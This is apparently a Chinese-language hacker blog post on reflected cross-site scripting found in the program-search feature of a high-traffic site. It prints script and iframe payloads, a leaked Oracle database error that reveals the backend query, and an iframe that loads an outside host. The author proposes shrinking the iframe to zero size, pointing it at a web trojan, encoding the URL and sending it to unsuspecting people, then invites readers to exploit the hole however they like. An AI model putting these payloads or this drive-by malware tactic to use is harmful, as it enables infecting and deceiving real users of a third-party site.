前天黑眼圈發來一個站讓找漏洞看了下排名.汗.全球排名589..這樣的站安全系數按理來說一定很高的..想從注入方面下手機率不會很大.看了下主頁有個節目搜索.輸入<script>alert("fhod")</script>?key=<script&g ... ")</script>出錯信息[handle]QUERY STRING:select count(channel_name) from pps_channel_info where contains(playbill,?,1)>0 Biuld Array:Array( [0] => )[Last query: select count(channel_name) from pps_channel_info where contains(playbill,:0,1)>0 ][Native code: 29902][Native message: ORA-29902: error in executing ODCIIndexStart() routineORA-20000: Oracle Text error:DRG-50900: text query parser error on line 1, column 9 DRG-50905: invalid score threshold ALERT ]Error Message:MDB2 Error: unknown error開始輸入的被換成了大寫..<SCRIPT>ALERT("FHOD")</SCRIPT>但卻不提示.試著搜索<iframe src=http://www.ciker.org/ width=200 height=200></iframe>
點擊查看大圖
呵.看到了把..如果把width和height都設置為0地址換成我們的網馬..發給別人一個這樣的地址會不會被懷疑呢?key=經過編碼地址為點擊查看大圖
?key=另外也存在同樣的問題搜索<script>alert("fhod")</script>點擊查看大圖
同樣的原理搜索iframe也是可以的.編碼後?m=search&search_text=&search_type=2&x=22&y=8點擊查看大圖
怎麼利用就隨大家喜歡了.. ,